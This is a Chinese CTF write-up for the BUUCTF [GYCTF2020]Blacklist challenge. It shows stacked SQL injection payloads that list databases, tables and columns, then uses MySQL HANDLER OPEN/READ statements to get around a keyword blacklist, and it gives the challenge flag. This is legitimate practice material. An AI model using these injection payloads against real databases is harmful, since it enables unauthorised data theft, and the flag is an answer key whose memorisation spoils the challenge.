zoukankan      html  css  js  c++  java
  • BUUCTF-[GYCTF2020]Blacklist 1 思路

    这道题之前我们做过,链接看这里https://www.cnblogs.com/junlebao/p/13681278.html

    1';show databases;#  //获取数据库名

    1';show tables;#    //获取表名

    1’;desc `表名`    //获取表结构

    当我们再次使用修改字段名这种方式的时候,发现过滤了这些关键字,该怎么办呢

    于是,我们查了百度,然后又学会了一个新姿势

    HANDLER [表名] OPEN;语句打开一个表,使其可以使用后续HANDLER [表名] READ;该表对象未被其他会话共享,并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭

    1’;

    HANDLER FlagHere OPEN;

    HANDLER FlagHere READ FIRST;  

    HANDLER FlagHere  close;#

    执行这个,然后,就可以出来flag了

    flag{4541eb28-dd41-4d34-a45e-6006e893fe4f}
  • 相关阅读:
    Flesch Reading Ease (poj 3371)
    保留道路
    列车调度
    三角形
    高精度加法
    AC自动机(1)
    线段树
    并查集(3)
    并查集(2)
    并查集
  • 原文地址:https://www.cnblogs.com/junlebao/p/13726104.html
Copyright © 2011-2022 走看看